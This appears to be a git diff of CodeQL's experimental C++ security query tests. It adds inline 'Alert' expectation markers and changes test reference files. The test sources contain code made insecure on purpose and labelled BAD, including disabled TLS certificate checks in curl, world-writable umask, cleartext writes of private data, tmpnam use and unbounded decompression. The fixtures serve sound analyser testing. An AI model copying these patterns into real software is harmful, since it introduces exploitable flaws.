a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-243/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-243/semmle/tests/test.cpp @@ -9,7 +9,7 @@ int chdir(char *path); void exit(int status); int funTest1(){ - if (chroot("/myFold/myTmp") == -1) { // BAD + if (chroot("/myFold/myTmp") == -1) { // BAD // $ Alert exit(-1); } return 0; @@ -26,7 +26,7 @@ int funTest2(){ } int funTest3(){ - chdir("/myFold/myTmp"); // BAD + chdir("/myFold/myTmp"); // BAD // $ Alert return 0; } int main(int argc, char *argv[]) diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-266/semmle/tests/IncorrectPrivilegeAssignment.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-266/semmle/tests/IncorrectPrivilegeAssignment.qlref index 9012747f4ba9..835b6c80fb1e 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-266/semmle/tests/IncorrectPrivilegeAssignment.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-266/semmle/tests/IncorrectPrivilegeAssignment.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-266/IncorrectPrivilegeAssignment.ql +query: experimental/Security/CWE/CWE-266/IncorrectPrivilegeAssignment.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-266/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-266/semmle/tests/test.cpp index 57333e8f586e..85484793e98f 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-266/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-266/semmle/tests/test.cpp @@ -6,7 +6,7 @@ int fclose(FILE *stream); void funcTest1() { - umask(0666); // BAD + umask(0666); // BAD // $ Alert FILE *fe; fe = fopen("myFile.txt", "wt"); fclose(fe); @@ -27,7 +27,7 @@ void funcTest2(int mode) FILE *fe; fe = fopen("myFile.txt", "wt"); fclose(fe); - chmod("myFile.txt",0555-mode); // BAD + chmod("myFile.txt",0555-mode); // BAD // $ Alert } void funcTest2g(int mode) diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-285/PamAuthorization.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-285/PamAuthorization.qlref index f1135f7d536a..77270c3533aa 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-285/PamAuthorization.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-285/PamAuthorization.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-285/PamAuthorization.ql +query: experimental/Security/CWE/CWE-285/PamAuthorization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-285/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-285/test.cpp index e2753f10775e..eb6628850ea0 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-285/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-285/test.cpp @@ -26,7 +26,7 @@ bool PamAuthBad(const std::string &username_in, return false; } - err = pam_authenticate(pamh, 0); + err = pam_authenticate(pamh, 0); // $ Alert if (err != PAM_SUCCESS) return err; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-295/CurlSSL.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-295/CurlSSL.cpp index 60a34889e05b..451ce5423e64 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-295/CurlSSL.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-295/CurlSSL.cpp @@ -22,8 +22,8 @@ char host[] = "codeql.com"; void bad(void) { std::unique_ptr curl = std::unique_ptr(curl_easy_init()); - curl_easy_setopt(curl.get(), CURLOPT_SSL_VERIFYPEER, 0); - curl_easy_setopt(curl.get(), CURLOPT_SSL_VERIFYHOST, 0); + curl_easy_setopt(curl.get(), CURLOPT_SSL_VERIFYPEER, 0); // $ Alert + curl_easy_setopt(curl.get(), CURLOPT_SSL_VERIFYHOST, 0); // $ Alert curl_easy_setopt(curl.get(), CURLOPT_URL, host); curl_easy_perform(curl.get()); } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-295/CurlSSL.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-295/CurlSSL.qlref index 6b09ac53c9b7..e2dd11da1e8e 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-295/CurlSSL.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-295/CurlSSL.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-295/CurlSSL.ql +query: experimental/Security/CWE/CWE-295/CurlSSL.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.expected index df8b26486f32..99a27a469894 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.expected @@ -1,3 +1,15 @@ +#select +| test.cpp:57:9:57:18 | theZipcode | test.cpp:57:9:57:18 | theZipcode | test.cpp:57:9:57:18 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:57:9:57:18 | theZipcode | this source of private data. | +| test.cpp:74:24:74:30 | medical | test.cpp:74:24:74:30 | medical | test.cpp:74:24:74:30 | medical | This write into the external location 'medical' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | +| test.cpp:78:24:78:27 | temp | test.cpp:74:24:74:30 | medical | test.cpp:78:24:78:27 | temp | This write into the external location 'temp' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | +| test.cpp:78:24:78:27 | temp | test.cpp:77:16:77:22 | medical | test.cpp:78:24:78:27 | temp | This write into the external location 'temp' may contain unencrypted data from $@. | test.cpp:77:16:77:22 | medical | this source of private data. | +| test.cpp:82:24:82:28 | buff5 | test.cpp:74:24:74:30 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | +| test.cpp:82:24:82:28 | buff5 | test.cpp:77:16:77:22 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:77:16:77:22 | medical | this source of private data. | +| test.cpp:82:24:82:28 | buff5 | test.cpp:81:22:81:28 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:81:22:81:28 | medical | this source of private data. | +| test.cpp:96:37:96:46 | theZipcode | test.cpp:96:37:96:46 | theZipcode | test.cpp:96:37:96:46 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:96:37:96:46 | theZipcode | this source of private data. | +| test.cpp:99:42:99:51 | theZipcode | test.cpp:96:37:96:46 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:96:37:96:46 | theZipcode | this source of private data. | +| test.cpp:99:42:99:51 | theZipcode | test.cpp:99:42:99:51 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:99:42:99:51 | theZipcode | this source of private data. | +| test.cpp:99:42:99:51 | theZipcode | test.cpp:99:61:99:70 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:99:61:99:70 | theZipcode | this source of private data. | edges | test.cpp:45:18:45:23 | buffer | test.cpp:47:10:47:15 | buffer | provenance | | | test.cpp:47:10:47:15 | buffer | test.cpp:45:7:45:10 | *func | provenance | | @@ -32,15 +44,3 @@ nodes | test.cpp:99:61:99:70 | theZipcode | semmle.label | theZipcode | subpaths | test.cpp:81:22:81:28 | medical | test.cpp:45:18:45:23 | buffer | test.cpp:45:7:45:10 | *func | test.cpp:81:17:81:20 | call to func | -#select -| test.cpp:57:9:57:18 | theZipcode | test.cpp:57:9:57:18 | theZipcode | test.cpp:57:9:57:18 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:57:9:57:18 | theZipcode | this source of private data. | -| test.cpp:74:24:74:30 | medical | test.cpp:74:24:74:30 | medical | test.cpp:74:24:74:30 | medical | This write into the external location 'medical' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | -| test.cpp:78:24:78:27 | temp | test.cpp:74:24:74:30 | medical | test.cpp:78:24:78:27 | temp | This write into the external location 'temp' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | -| test.cpp:78:24:78:27 | temp | test.cpp:77:16:77:22 | medical | test.cpp:78:24:78:27 | temp | This write into the external location 'temp' may contain unencrypted data from $@. | test.cpp:77:16:77:22 | medical | this source of private data. | -| test.cpp:82:24:82:28 | buff5 | test.cpp:74:24:74:30 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | -| test.cpp:82:24:82:28 | buff5 | test.cpp:77:16:77:22 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:77:16:77:22 | medical | this source of private data. | -| test.cpp:82:24:82:28 | buff5 | test.cpp:81:22:81:28 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:81:22:81:28 | medical | this source of private data. | -| test.cpp:96:37:96:46 | theZipcode | test.cpp:96:37:96:46 | theZipcode | test.cpp:96:37:96:46 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:96:37:96:46 | theZipcode | this source of private data. | -| test.cpp:99:42:99:51 | theZipcode | test.cpp:96:37:96:46 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:96:37:96:46 | theZipcode | this source of private data. | -| test.cpp:99:42:99:51 | theZipcode | test.cpp:99:42:99:51 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:99:42:99:51 | theZipcode | this source of private data. | -| test.cpp:99:42:99:51 | theZipcode | test.cpp:99:61:99:70 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:99:61:99:70 | theZipcode | this source of private data. | diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.qlref index 65c8c9c2dd4c..0952582b4064 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-359/PrivateCleartextWrite.ql \ No newline at end of file +query: experimental/Security/CWE/CWE-359/PrivateCleartextWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/test.cpp index 4d69ee5b2b72..b123603654c0 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/test.cpp @@ -54,7 +54,7 @@ void file() FILE *file; // BAD: write zipcode to file in cleartext - fputs(theZipcode, file); + fputs(theZipcode, file); // $ Alert // GOOD: encrypt first char *encrypted = encrypt(theZipcode); @@ -71,15 +71,15 @@ int main(int argc, char **argv) char *buff4; // BAD: write medical to buffer in cleartext - sprintf(buff1, "%s", medical); + sprintf(buff1, "%s", medical); // $ Alert Source // BAD: write medical to buffer in cleartext - char *temp = medical; - sprintf(buff2, "%s", temp); + char *temp = medical; // $ Source + sprintf(buff2, "%s", temp); // $ Alert // BAD: write medical to buffer in cleartext - char *buff5 = func(medical); - sprintf(buff3, "%s", buff5); + char *buff5 = func(medical); // $ Source + sprintf(buff3, "%s", buff5); // $ Alert char *buff6 = encrypt(medical); // GOOD: encrypt first @@ -93,10 +93,10 @@ void stream() ofstream mystream; // BAD: write zipcode to file in cleartext - mystream << "the zipcode is: " << theZipcode; + mystream << "the zipcode is: " << theZipcode; // $ Alert Source // BAD: write zipcode to file in cleartext - (mystream << "the zipcode is: ").write(theZipcode, strlen(theZipcode)); + (mystream << "the zipcode is: ").write(theZipcode, strlen(theZipcode)); // $ Alert // GOOD: encrypt first char *encrypted = encrypt(theZipcode); diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-369/semmle/tests/DivideByZeroUsingReturnValue.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-369/semmle/tests/DivideByZeroUsingReturnValue.qlref index e134a5229da1..77407cfd8254 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-369/semmle/tests/DivideByZeroUsingReturnValue.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-369/semmle/tests/DivideByZeroUsingReturnValue.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-369/DivideByZeroUsingReturnValue.ql +query: experimental/Security/CWE/CWE-369/DivideByZeroUsingReturnValue.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-369/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-369/semmle/tests/test.cpp index 882f66184854..3ea20ea8c44d 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-369/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-369/semmle/tests/test.cpp @@ -44,13 +44,13 @@ int getSize2(int type) { int badTestf1(int type, int met) { int is = getSize(type); - if (met == 1) return 123 / is; // BAD - else return 123 / getSize2(type); // BAD + if (met == 1) return 123 / is; // BAD // $ Alert + else return 123 / getSize2(type); // BAD // $ Alert } int badTestf2(int type) { int is; is = getSize(type); - return 123 / is; // BAD + return 123 / is; // BAD // $ Alert } int badTestf3(int type, int met) { @@ -62,23 +62,23 @@ int badTestf3(int type, int met) { case 2: if (0 == is) return 123 / is; // BAD [NOT DETECTED] case 3: - if (!is & 123 / is) // BAD + if (!is & 123 / is) // BAD // $ Alert return 123; case 4: - if (!is | 123 / is) // BAD + if (!is | 123 / is) // BAD // $ Alert return 123; case 5: - if (123 / is || !is) // BAD + if (123 / is || !is) // BAD // $ Alert return 123; case 6: - if (123 / is && !is) // BAD + if (123 / is && !is) // BAD // $ Alert return 123; case 7: - if (!is) return 123 / is; // BAD + if (!is) return 123 / is; // BAD // $ Alert case 8: - if (is > -1) return 123 / is; // BAD + if (is > -1) return 123 / is; // BAD // $ Alert case 9: - if (is < 2) return 123 / is; // BAD + if (is < 2) return 123 / is; // BAD // $ Alert } if (is != 0) return -1; if (is == 0) type += 1; @@ -125,20 +125,20 @@ int badTestf4(int type) { int is = getSize(type); int d; d = type * is; - return 123 / d; // BAD + return 123 / d; // BAD // $ Alert } int badTestf5(int type) { int is = getSize(type); int d; d = is / type; - return 123 / d; // BAD + return 123 / d; // BAD // $ Alert } int badTestf6(int type) { int is = getSize(type); int d; d = is / type; - return type * 123 / d; // BAD + return type * 123 / d; // BAD // $ Alert } int badTestf7(int type, int met) { @@ -150,7 +150,7 @@ int badTestf7(int type, int met) { return 123 / is; // GOOD } quit: - return 123 / is; // BAD + return 123 / is; // BAD // $ Alert } int goodTestf7(int type, int met) { @@ -169,8 +169,8 @@ int goodTestf7(int type, int met) { int badTestf8(int type) { int is = getSize(type); - type /= is; // BAD - type %= is; // BAD + type /= is; // BAD // $ Alert + type %= is; // BAD // $ Alert return type; } @@ -184,7 +184,7 @@ float getSizeFloat(float type) { } float badTestf9(float type) { float is = getSizeFloat(type); - return 123 / is; // BAD + return 123 / is; // BAD // $ Alert } float goodTestf9(float type) { float is = getSizeFloat(type); @@ -196,18 +196,18 @@ int badTestf10(int type) { int out = type; int is = getSize(type); if (is > -2) { - out /= 123 / (is + 1); // BAD + out /= 123 / (is + 1); // BAD // $ Alert } if (is > 0) { - return 123 / (is - 1); // BAD + return 123 / (is - 1); // BAD // $ Alert } if (is <= 0) return 0; - return 123 / (is - 1); // BAD + return 123 / (is - 1); // BAD // $ Alert return 0; } int badTestf11(int type) { int is = getSize(type); - return 123 / (is - 3); // BAD + return 123 / (is - 3); // BAD // $ Alert } int goodTestf11(int type) { @@ -255,12 +255,12 @@ int badMySubDiv(int type, int is) { void badTestf13(int type) { int is = getSize(type); - badMyDiv(type, is); // BAD - badMyDiv(type, is - 2); // BAD - badMySubDiv(type, is); // BAD + badMyDiv(type, is); // BAD // $ Alert + badMyDiv(type, is - 2); // BAD // $ Alert + badMySubDiv(type, is); // BAD // $ Alert goodMyDiv(type, is); // GOOD if (is < 5) - badMySubDiv(type, is); // BAD + badMySubDiv(type, is); // BAD // $ Alert if (is < 0) badMySubDiv(type, is); // BAD [NOT DETECTED] if (is > 5) @@ -270,9 +270,9 @@ void badTestf13(int type) { if (is > 0) badMyDiv(type, is); // GOOD if (is < 5) - badMyDiv(type, is - 3); // BAD + badMyDiv(type, is - 3); // BAD // $ Alert if (is < 0) - badMyDiv(type, is + 1); // BAD + badMyDiv(type, is + 1); // BAD // $ Alert if (is > 5) badMyDiv(type, is - 3); // GOOD } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-377/semmle/tests/InsecureTemporaryFile.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-377/semmle/tests/InsecureTemporaryFile.qlref index beec38ab5dc6..d4fa44200b10 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-377/semmle/tests/InsecureTemporaryFile.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-377/semmle/tests/InsecureTemporaryFile.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-377/InsecureTemporaryFile.ql +query: experimental/Security/CWE/CWE-377/InsecureTemporaryFile.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-377/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-377/semmle/tests/test.cpp index 07efea49e784..9adc5304984c 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-377/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-377/semmle/tests/test.cpp @@ -13,7 +13,7 @@ int fclose(FILE *stream); int funcTest1() { FILE *fp; - char *filename = tmpnam(NULL); // BAD + char *filename = tmpnam(NULL); // BAD // $ Alert fp = fopen(filename,"w"); fprintf(fp,"%s\n","data to file"); fclose(fp); diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-401/semmle/tests/MemoryLeakOnFailedCallToRealloc.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-401/semmle/tests/MemoryLeakOnFailedCallToRealloc.qlref index e80e86cbdccc..d3ede250c5b3 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-401/semmle/tests/MemoryLeakOnFailedCallToRealloc.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-401/semmle/tests/MemoryLeakOnFailedCallToRealloc.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-401/MemoryLeakOnFailedCallToRealloc.ql \ No newline at end of file +query: experimental/Security/CWE/CWE-401/MemoryLeakOnFailedCallToRealloc.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-401/semmle/tests/test.c b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-401/semmle/tests/test.c index df33fc19ef60..f5b58b8438fb 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-401/semmle/tests/test.c +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-401/semmle/tests/test.c @@ -31,7 +31,7 @@ unsigned char * badResize_0(unsigned char * buffer,size_t currentSize,size_t new // BAD: on unsuccessful call to realloc, we will lose a pointer to a valid memory block if (currentSize < newSize) { - buffer = (unsigned char *)realloc(buffer, newSize); + buffer = (unsigned char *)realloc(buffer, newSize); // $ Alert } return buffer; } @@ -60,7 +60,7 @@ unsigned char * badResize_1_0(unsigned char * buffer,size_t currentSize,size_t n // BAD: on unsuccessful call to realloc, we will lose a pointer to a valid memory block if (currentSize < newSize) { - buffer = (unsigned char *)realloc(buffer, newSize); + buffer = (unsigned char *)realloc(buffer, newSize); // $ Alert } return buffer; } @@ -136,7 +136,7 @@ unsigned char * badResize_1_1(unsigned char * buffer,size_t currentSize,size_t n // BAD: on unsuccessful call to realloc, we will lose a pointer to a valid memory block if (currentSize < newSize) { - buffer = (unsigned char *)realloc(buffer, newSize); + buffer = (unsigned char *)realloc(buffer, newSize); // $ Alert } if(!buffer) aFakeFailed_1(1, 1); @@ -183,7 +183,7 @@ unsigned char * badResize_2_0(unsigned char * buffer,size_t currentSize,size_t n assert(buffer!=0); if (currentSize < newSize) { - buffer = (unsigned char *)realloc(buffer, newSize); + buffer = (unsigned char *)realloc(buffer, newSize); // $ Alert } return buffer; } @@ -279,7 +279,7 @@ unsigned char *goodResize_3_1(unsigned char *buffer, size_t currentSize, size_t unsigned char *tmp = buffer; if (currentSize < newSize) { - buffer = (unsigned char *)realloc(buffer, newSize); + buffer = (unsigned char *)realloc(buffer, newSize); // $ Alert if (buffer == NULL) { free(tmp); @@ -296,7 +296,7 @@ unsigned char *goodResize_3_2(unsigned char *buffer, size_t currentSize, size_t unsigned char *tmp = buffer; if (currentSize < newSize) { - tmp = (unsigned char *)realloc(tmp, newSize); + tmp = (unsigned char *)realloc(tmp, newSize); // $ Alert if (tmp != 0) { buffer = tmp; @@ -325,7 +325,7 @@ unsigned char * badResize_5_2(unsigned char *buffer, size_t currentSize, size_t // BAD: on unsuccessful call to realloc, we will lose a pointer to a valid memory block if (currentSize < newSize) { - buffer = (unsigned char *)realloc(buffer, newSize); + buffer = (unsigned char *)realloc(buffer, newSize); // $ Alert } if (cond) { @@ -339,7 +339,7 @@ unsigned char * badResize_5_1(unsigned char *buffer, size_t currentSize, size_t // BAD: on unsuccessful call to realloc, we will lose a pointer to a valid memory block if (currentSize < newSize) { - buffer = (unsigned char *)realloc(buffer, newSize); + buffer = (unsigned char *)realloc(buffer, newSize); // $ Alert assert(cond); // irrelevant } return buffer; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.expected index b813f8532cb7..363b2aafa0fa 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.expected @@ -1,3 +1,17 @@ +#select +| brotliTest.cpp:18:35:18:53 | *access to array | main.cpp:7:33:7:36 | **argv | brotliTest.cpp:18:35:18:53 | *access to array | The decompression output of $@ is not limited | brotliTest.cpp:18:5:18:27 | call to BrotliDecoderDecompress | BrotliDecoderDecompress | +| brotliTest.cpp:24:51:24:58 | **& ... | main.cpp:7:33:7:36 | **argv | brotliTest.cpp:24:51:24:58 | **& ... | The decompression output of $@ is not limited | brotliTest.cpp:24:5:24:33 | call to BrotliDecoderDecompressStream | BrotliDecoderDecompressStream | +| libarchiveTests.cpp:22:41:22:42 | *ar | main.cpp:7:33:7:36 | **argv | libarchiveTests.cpp:22:41:22:42 | *ar | The decompression output of $@ is not limited | libarchiveTests.cpp:22:17:22:39 | call to archive_read_data_block | archive_read_data_block | +| minizipTest.cpp:17:52:17:67 | *access to array | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:17:52:17:67 | *access to array | The decompression output of $@ is not limited | minizipTest.cpp:17:22:17:38 | call to mz_zip_entry_read | mz_zip_entry_read | +| minizipTest.cpp:26:30:26:39 | **zip_reader | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:26:30:26:39 | **zip_reader | The decompression output of $@ is not limited | minizipTest.cpp:26:5:26:28 | call to mz_zip_reader_entry_save | mz_zip_reader_entry_save | +| minizipTest.cpp:26:30:26:39 | *zip_reader | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:26:30:26:39 | *zip_reader | The decompression output of $@ is not limited | minizipTest.cpp:26:5:26:28 | call to mz_zip_reader_entry_save | mz_zip_reader_entry_save | +| minizipTest.cpp:28:13:28:19 | *access to array | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:28:13:28:19 | *access to array | The decompression output of $@ is not limited | minizipTest.cpp:28:5:28:11 | call to UnzOpen | UnzOpen | +| zlibTest.cpp:25:13:25:22 | & ... | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:25:13:25:22 | & ... | The decompression output of $@ is not limited | zlibTest.cpp:25:5:25:11 | call to inflate | inflate | +| zlibTest.cpp:41:20:41:26 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:41:20:41:26 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:41:13:41:18 | call to gzread | gzread | +| zlibTest.cpp:51:38:51:44 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:51:38:51:44 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:51:14:51:20 | call to gzfread | gzfread | +| zlibTest.cpp:62:25:62:31 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:62:25:62:31 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:62:18:62:23 | call to gzgets | gzgets | +| zlibTest.cpp:77:45:77:59 | *input | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:77:45:77:59 | *input | The decompression output of $@ is not limited | zlibTest.cpp:77:5:77:14 | call to uncompress | uncompress | +| zstdTest.cpp:39:69:39:74 | & ... | main.cpp:7:33:7:36 | **argv | zstdTest.cpp:39:69:39:74 | & ... | The decompression output of $@ is not limited | zstdTest.cpp:39:32:39:52 | call to ZSTD_decompressStream | ZSTD_decompressStream | edges | brotliTest.cpp:15:41:15:44 | **argv | brotliTest.cpp:15:41:15:44 | **argv | provenance | | | brotliTest.cpp:15:41:15:44 | **argv | brotliTest.cpp:18:35:18:53 | *access to array | provenance | | @@ -214,17 +228,3 @@ subpaths | zlibTest.cpp:83:19:83:25 | *access to array | zlibTest.cpp:16:26:16:30 | *input | zlibTest.cpp:16:26:16:30 | *input | zlibTest.cpp:83:19:83:25 | UnsafeInflate output argument | | zlibTest.cpp:84:18:84:24 | *access to array | zlibTest.cpp:37:25:37:32 | *fileName | zlibTest.cpp:37:25:37:32 | *fileName | zlibTest.cpp:84:18:84:24 | UnsafeGzread output argument | | zlibTest.cpp:85:19:85:25 | *access to array | zlibTest.cpp:71:26:71:30 | *input | zlibTest.cpp:71:26:71:30 | *input | zlibTest.cpp:85:19:85:25 | InflateString output argument | -#select -| brotliTest.cpp:18:35:18:53 | *access to array | main.cpp:7:33:7:36 | **argv | brotliTest.cpp:18:35:18:53 | *access to array | The decompression output of $@ is not limited | brotliTest.cpp:18:5:18:27 | call to BrotliDecoderDecompress | BrotliDecoderDecompress | -| brotliTest.cpp:24:51:24:58 | **& ... | main.cpp:7:33:7:36 | **argv | brotliTest.cpp:24:51:24:58 | **& ... | The decompression output of $@ is not limited | brotliTest.cpp:24:5:24:33 | call to BrotliDecoderDecompressStream | BrotliDecoderDecompressStream | -| libarchiveTests.cpp:22:41:22:42 | *ar | main.cpp:7:33:7:36 | **argv | libarchiveTests.cpp:22:41:22:42 | *ar | The decompression output of $@ is not limited | libarchiveTests.cpp:22:17:22:39 | call to archive_read_data_block | archive_read_data_block | -| minizipTest.cpp:17:52:17:67 | *access to array | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:17:52:17:67 | *access to array | The decompression output of $@ is not limited | minizipTest.cpp:17:22:17:38 | call to mz_zip_entry_read | mz_zip_entry_read | -| minizipTest.cpp:26:30:26:39 | **zip_reader | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:26:30:26:39 | **zip_reader | The decompression output of $@ is not limited | minizipTest.cpp:26:5:26:28 | call to mz_zip_reader_entry_save | mz_zip_reader_entry_save | -| minizipTest.cpp:26:30:26:39 | *zip_reader | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:26:30:26:39 | *zip_reader | The decompression output of $@ is not limited | minizipTest.cpp:26:5:26:28 | call to mz_zip_reader_entry_save | mz_zip_reader_entry_save | -| minizipTest.cpp:28:13:28:19 | *access to array | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:28:13:28:19 | *access to array | The decompression output of $@ is not limited | minizipTest.cpp:28:5:28:11 | call to UnzOpen | UnzOpen | -| zlibTest.cpp:25:13:25:22 | & ... | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:25:13:25:22 | & ... | The decompression output of $@ is not limited | zlibTest.cpp:25:5:25:11 | 